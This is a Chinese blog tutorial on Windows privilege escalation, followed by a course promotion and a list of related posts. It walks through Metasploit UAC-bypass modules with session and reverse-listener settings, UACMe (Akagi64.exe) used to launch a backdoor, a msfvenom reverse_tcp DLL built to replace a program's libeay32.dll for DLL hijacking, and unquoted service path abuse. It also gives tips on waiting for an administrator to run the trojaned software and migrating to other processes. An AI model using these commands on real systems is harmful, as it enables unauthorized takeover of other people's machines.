Windows权限提升—BypassUAC、DLL劫持、引号路径、服务权限等提权

于 2024-04-28 18:51:10 发布
阅读量178 收藏 2
点赞数 2
分类专栏: 程序员 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84300239/article/details/138287851
版权
本文详细介绍了WindowsUAC用户账户控制机制及其在提升系统安全中的作用,包括UAC的设置、MSF绕过UAC的方法、DLL劫持提权案例以及不带引号服务路径的应用。文章展示了如何在不同系统版本中利用这些技巧进行权限提升,同时也强调了学习系统化知识的重要性。
摘要由CSDN通过智能技术生成

2. UAC提权

UAC(User Account Control,用户账号控制)是微软为了提高系统安全性在Windows Vista中引入的技术。UAC要求用户在执行可能影响计算机运行的操作或在进行可能影响其他用户的设置之前,拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证,以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行更改。

在Windows Vista及以后的版本中,微软设置了安全控制策略,分为高、中、低三个等级。高等级的进程有管理员权限;中等级的进程有普通用户权限;低等级的进程,权限是有限的,以保证系统在受到安全威胁时造成的损害最小。在权限不够的情况下,访问系统磁盘的根目录、Windows目录,以及读写系统登录数据库等操作,都需要经常UAC(User Account Control,用户账号控制)的认证。

2.1. UAC设置

  • 始终通知:这是最严格的设置,每当有程序需要使用高级别的权限时都会提示本地用户
  • 仅在程序试图更改我的计算机时通知我:这是UAC的默认设置。当本地Windows程序要使用高级别的权限时,不会通知用户。但是,当第三方程序要使用高级别的权限时,会提示本地用户
  • 仅在程序试图更改我的计算机时通知我(不降低桌面的亮度):与上一条设置的要求相同,但在提示用户时不降低桌面的亮度
  • 从不提示:当用户为系统管理员时,所有程序都会以最高权限运行

2.2. MSF绕过UAC

这里我就不演示如何设置监听与生成木马了,在前面的文章中都提到相关的操作。

2.2.1. Windows7系统案例

这里是基于默认等级的哦,如果被设置为最高的话,那就凉凉了,因为需要人为去点击,但是我们正常需要提权都是由于我们获取的权限太低,或者远程桌面打不开,你如何去点击,都无法点击了,何谈提权。

2.2.1.1. UAC状态

这里的UAC状态是默认,也就是中等级别,至于打开这个UAC可以在运行框中输入"msconfig",然后工具一栏就能看到更改UAC设置。

一般UAC关闭的情况下使用getsystem就能够提权成功。

在这里插入图片描述

2.2.1.2. 尝试getsystem提权

这里在尝试使用getsystem提权,发现无法提权,那么就需要使用UAC进行绕过了。

background  ##将会话置于后台,不然会在使用bypass的找不到会话。

在这里插入图片描述

2.2.1.3. 搜索UAC绕过bypass方式

这里能够看到有很多的UAC绕过的bypass方式,但是这里面是分不同Windows版本的,有的可能在Windows7上能用,有的可能就不能用,不过最好选择日期靠近的,这样成功率大一点。

search uac  ##搜索

在这里插入图片描述

2.2.1.4. 尝试使用UAC绕过提权
use exploit/windows/local/bypassuac   ##选择bypass
sessions         ##选择会话
set session 1    ##设定会话
set lport 5555   ##设定反弹端口,这里不设置也可以,但是有时候直接反弹回来,会出现反弹不成功的情况。
run  ##执行

在这里插入图片描述

2.2.1.5. 查看反弹效果

通过反弹回来的效果能够看到,成功提权了。

在这里插入图片描述

2.2.2. Windows10系统案例

这里还是使用默认的UAC等级进行提权。

2.2.2.1. 尝试getsystem提权

可以看到,这里同样是提权失败。

在这里插入图片描述

2.2.2.2. 尝试使用UAC绕过提权

这里我也是尝试了好几个bypass才成功的,环境不同,可能使用到的bypass也是不同的,有些bypass需要也能提权,但是需要点击确定,所以多尝试尝试。

use exploit/windows/local/bypassuac_silentcleanup   ##选择模块
sessions    ##选择会话
set session 5   ##设置会话
set lport 6666  ##设置监听端口
run   ##执行

在这里插入图片描述

2.2.2.3. 查看反弹效果

这里能够看到是成功提权了。

在这里插入图片描述

2.3. UACMe工具绕过UAC

这里我就不搭建WEB环境了,UACMe提取可以在低权限的时候提权,但是同样在UAC设置为高的时候同样也是无法进行直接提权的,需要人为的去点击确定才可以。

UACMe工具涵盖了Windows7-11以及server服务器系统均可以提权。

同时这里我就演示个Windows10系统的,至于Windows7肯定要比Windows10好提权。

2.3.1. 下载链接

注意想要使用这个工具需要对其进行编译成功.exe文件,而我这里没有最新的.exe文件,这里给个老版的,但是也没差到哪里去,具体使用的介绍建议去GitHub上自己看。

UACMe

百度网盘UACMe 提取码:86lm

2.3.2. Windows10系统案例

这里在下载完UACMe的时候,里面会有两个exe执行文件,一个是32位的,一个是64位的,按照不同的系统位数,放入不同的exe文件进行执行。

2.3.2.1. 系统内操作

注意这里弹出的窗口只是演示,在实际的环境中,我们无法登录桌面,可以使用改工具去运行木马后门,让其上线即可。

至于编号,新版的UACMe里包含70余种,可以一个一个尝试。

语法:Akagi64.exe 编号

在这里插入图片描述

2.3.2.2. 反弹上线

这里同样我们监听一下端口,并且利用工具进行反弹上线。

语法:Akagi64.exe 编号 后门程序地址

在这里插入图片描述

2.3.2.3. 查看权限

这里反弹上来的可能还是普通管理员权限,这里可以使用getsystem进行再次提权,可以看到成功提权。

在这里插入图片描述

3. dll劫持提权

3.1. Windows10系统案例

Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径。

它会根据下面的顺序进行搜索:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)

程序运行一般会加载系统dll或本身程序自带的dll,如果我们将程序执行时需要加载的dll文件替换成程序,那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。

3.1.1. 收集进程加载的dll

这里会出现一个问题,没有远程桌面我们如何收集,这里其实有个很简单的办法就是,通过上线普通木马后,看看能不能查看有存在哪些服务,然后找到相关服务本地安装,安装后使用火绒剑等工具进行查找加载的dll文件即可。

像系统文件加载的dll我们是动不了的,我们一般能懂的都是未知文件和数字签名文件。

在这里插入图片描述

3.1.2. MSF制作dll木马

这里我们选中libeay32.dll文件,我们就制作这个木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20  lport=5566 -f dll >libeay32.dll

在这里插入图片描述

3.1.3. 替换dll文件

这里将生成的dll文件替换原本的dll。

在这里插入图片描述

3.1.4. 运行软件

运行软件,不过需要注意的是,在实际环境中由于我未获取到桌面权限,所以需要等待管理员去运行,同时由于我们替换了dll文件,所以会导致管理员在运行软件的时候会出现无响应的情况,这时无法保证,管理员会卸载重新安装。

在这里插入图片描述

3.1.5. 设置监听

这里设置监听,当管理员去运行软件的时候就会上线,像上面提到的,当软件不能用了,无法保证管理员不会卸载重装或者重启电脑,所以在获取权限后需要及时的移植到其它进程上面。

可以看到的是成功上线了。

在这里插入图片描述

3.1.6. 提权

我这里没有提权成功,可能是由于系统问题,但是调试了半天也没成功,这也能够证明不是所有提权方式都是能够百分比提权成功的,这里也只是演示,可以用这个方式进行提权。

在这里插入图片描述

3.2. Windows2012系统案例

前面的分析与劫持等步骤就不在赘述了,直接看案效果把。

可以看到这里使用Windows2012就能够成功提权,所以之前提到的有些提权方式是根据不同系统可能有不同的效果。

在这里插入图片描述

4. 不带引号服务路径配合

注意提权方式和操作系统版本等都没有任何关系。

当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行路径,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

不过这个确实局限性还是很大的,比如虚拟机中没有找到这样的情况,实体机没有找到,客户现场机器也没找到…同时还有一个问题是就算有,很多都是在C盘中,如果基本权限不够大,那么也凉凉,也用不了。

4.1. 介绍案例

这里的图片我借用一下其它博客的,由于我自己电脑以及其它电脑,虚拟机都没有这样的路径。

次序执行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

在这里插入图片描述

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84300239
关注
专栏目录
权限提升——windows进程注入&令牌窃取&土豆&BypassUAC&DLL文件劫持&不带引号服务路径
m0_61506558的博客
01-15 926
RottenPotato (烂土豆)提权的原理可以简述如下: 1.欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NTAUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过—系列的Windows API调用实现的。 3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限
红队内网攻防渗透:内网渗透之windows内网权限提升技术:服务
最新发布
HACKONE的博客
06-17 182
原理:Windows程序启动的时候需要DLL。由于管理配置错误,用户可能对服务拥有过多的权限,例如,可以直接修改它导致重定向执行文件。检测:火绒剑 利用火绒剑进行进程分析加载DLLDLL文件要在软件自身的目录里,这里使用进程查看工具发现了两个自身目录的dll。但是如果路径是有空格的 且没有双引号,程序会认为第一个空格处是程序自身,后面的其他空格代表程序的参数。过程:信息收集-进程调试-制作dll并上传-替换dll-等待启动应用成功。过程:检测服务权限配置-制作文件并上传-更改服务路径指向-调用后成功。
BypassUAC-权限提升
weixin_45701675的博客
11-19 1305
什么是UAC?如何设置? UAC(UserAccount Control,用户账户控制) 简言之就是在Vista及更高版本中通过弹框进一步让用户 确认是否授权当前可执行文件来达到阻止恶意程序的目的。 可以通过命令msconfig启动管理器,更改UAC设置等级(默认等级) 参考:http://cn-sec.com/archives/116488.html #BypassUAC提权?常见绕过项目? 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC 绕过项目:M
bypassUAC提权
yangbz123的博客
06-07 1529
目录Windows UAC概述UAC结构图UAC组件描述UAC滑块设置UAC可授权的控制漏洞提权UAC提权之MSF1、bypassuac提权2、bypassuac_eventvwr提权3、RunAs提权UAC提权之Empire1、bapassuac模块提权2、bapassuac_wscript模块提权UAC提权之CSUAC提权之powershell参考文献 Windows UAC概述 用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作
权限提升】WIN本地用户&BypassUAC&DLL劫持&引号路径&服务权限
今天是几号的博客
02-24 1521
如果这些DLL 不存在,则可以通过在应用程序要查找的位置放置恶意DLL提权。上方dll文件在C:\Windows目录下,普通用户权限不够,不能够劫持。注意:如果你经常安装新软件或访问不熟悉的网站,但更改 Windows 设置时不希望收到通知,则建议使用此选项。注意:如果需要花费很长时间才能降低计算机上的桌面亮度时,才建议选择此选项。注意:如果你经常安装新软件或访问陌生网站,则推荐使用此选项。利用火绒剑进行进程分析加载DLL,一般寻程序DLL利用。当你对 Windows 设置进行更改时不通知你。
bypassuac提权
qq_46258964的博客
06-20 1387
UAC介绍 UAC是微软为提高系统安全性中引入的技术。 UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前, 拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证, 以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。 微软设置的安全控制策略,分为高、中、低三个等级。 高等级的进程有管理员权限;中等级的进程有普通管理员权限;低等级的进程权限是有限的,以保证系统在受到安全威胁时造成的损害最小。uac绕过 为了远程执行目标的ex
Bypass UAC 提权
LYSM
06-30 3877
背景 UAC(User Account Control)是微软在 Windows Vista 以后版本引入的一种安全机制,通过 UAC,应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员特别授予管理员级别的系统访问权限UAC 可以阻止未经授权的应用程序自动进行安装,并防止无意中更改系统设置。 UAC需要授权的动作包括:配置Windows Update;增加或删除用户账户;改变用户的账户类型;改变UAC设置;安装ActiveX;安装或移除程序;安装设备驱动程序;设置家长控制;将文件移动或复制到
系统提权之:Windows 提权
f_carey的博客
11-04 2774
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
Windows 提权
weixin_45253622的博客
01-17 4355
Windows 提权 文章目录Windows 提权1.系统内核溢出漏洞提权2.系统配置错误提权2.1 错误权限配置2.2 计划任务提权:2.3 可信任服务路径漏洞2.4 不安全的注册表权限配置2.5 启用注册表键 AlwaysInstallElevated3.组策略首选项提权4.bypassUAC提权5.令牌窃取6.数据库提权MSSQL提权:MYSQL提权MOF提权UDF提权各种CVE7.其他手法 1.系统内核溢出漏洞提权 利用系统本身存在的一些系统内核溢出漏洞,未打相应的补丁,攻击者通过对比systemi
windows提权总结
weixin_68652890的博客
04-05 5174
windows提权总结 文章目录溢出漏洞提权at&sc&ps命令提权数据库提权mysqlUDF提权MOF提权启动项提权sql serverxp_cmdshell提权sp_oacreate提权令牌窃取提权RottenPotato(烂土豆)配合令牌窃取DLL劫持提权不带引号服务路径配合msf提权不安全的服务权限配合MSF提权其他方法 溢出漏洞提权 拿到服务器普通权限→上传溢出程序→提权至administrator。 内核溢出漏洞总结:https://github.com/SecWiki/win
bypass UAC 提权
a439017985的博客
02-24 1893
在meterpreter下 getuid sysinfo 查看系统版本及相关信息(多少位) background search bypassuac   use exploit/windows/local/bypassuac_eventvwr   此exploit对win10 64位有效 injection的对win10 32位的有效,对64位的无效 set session ex
通过Bypass UAC进行权限提升
内心不种满鲜花就会长满杂草
01-30 4412
用户账户控制(User Account control,UAC)是windows系统采用的一种控制机制,可以阻止自动安装未经授权的应用 并防止意外更改系统设置,有助于防止恶意软件损坏计算机。用户账户控制程序使应用程序和任务始终在非管理员账户的安全上下文中运行,除非管理员专门授权管理员级别的权限。开启用户账户控制后,每个需要使用管理员访问令牌的应用都必须征得用户同意。UAC限制所有用户包括非RID500的管理员用户使用标准用户登录到他们的计算机,并在标准用户的安全性上下文中访问资源和运行应用。
系统提权方法大汇总
caiguazheng4921的博客
04-19 335
No.10 VncVnc不少老外都在用,国内用的比较少,但是几率很大。==============VNC提权方法==============利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password69 45150 96177 b1243 f3153 ...
linux系统提权
weixin_53639243的博客
04-23 1101
uname -a 显示全部系统信息cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版cat /etc/passwd 所有人都可看//aux都是参数a = show processes for all users 显示所有用户的进程u = display the process's user/owner 显示用户x = also show processes not attached to a terminal 显示无控制终端的进程
系统提权——Windows系统提权
JulySec的博客
02-13 2148
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
Windows权限提升BypassUACDLL劫持,2024年最新2024BAT大厂网络安全社招面试题
2401_84185145的博客
04-10 603
关于Windows提权应该这篇总结完就结束了,再次提醒一下关于第三方软件或插件提权,不是不写,而且有些软件都会自动更新,很多漏洞基本上很少遇到,同时也利用不了,比如说:向日葵有一个版本能够提权,但是现在那个版本装再电脑上,根本连接不上向日葵的服务器,更何谈提权呢,同时还可以看日志,目前日志也更改了,端口不会再日志中出现了。前面几篇文章我就汇总在下面了,同时关于UAC提权之前一篇文章写的没那么细,这里重新补充一下。Windows权限提升—令牌窃取、UAC提权进程注入等提权
win提权第二弹服务提权
m0_73255659的博客
03-19 752
其次我们可以知道windows 服务是 与 exe 可执行文件相关,同时 我们可以知道服务需要指定一个用户,因此我们能够想到什么 就是上次我们分享到 计划任务。SCM 是一个负责根据需要管理服务状态、检查任何给定服务的当前状态并通常提供配置服务的方法的进程。如果我们能够也获得相应 exe 文件的修改权限我们是否可以根据这个权限,执行一个payload获取到相应服务指定用户的权限。但是此时我们不仅是要看我们有这个权限我们还要看 我们要运行的服务的目标账户有没有权限。此时我们正常会想到什么?
权限提升策略:烂土豆、dll劫持服务路径详解
在IT安全领域,本篇内容主要关注于Windows操作系统中的高级权限提升技术,特别是通过烂土豆(Potato.exe)和DLL劫持来获取更高的权限。首先,我们来探讨以下几个关键概念: 1. **权限提升与烂土豆(Potato.exe)**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值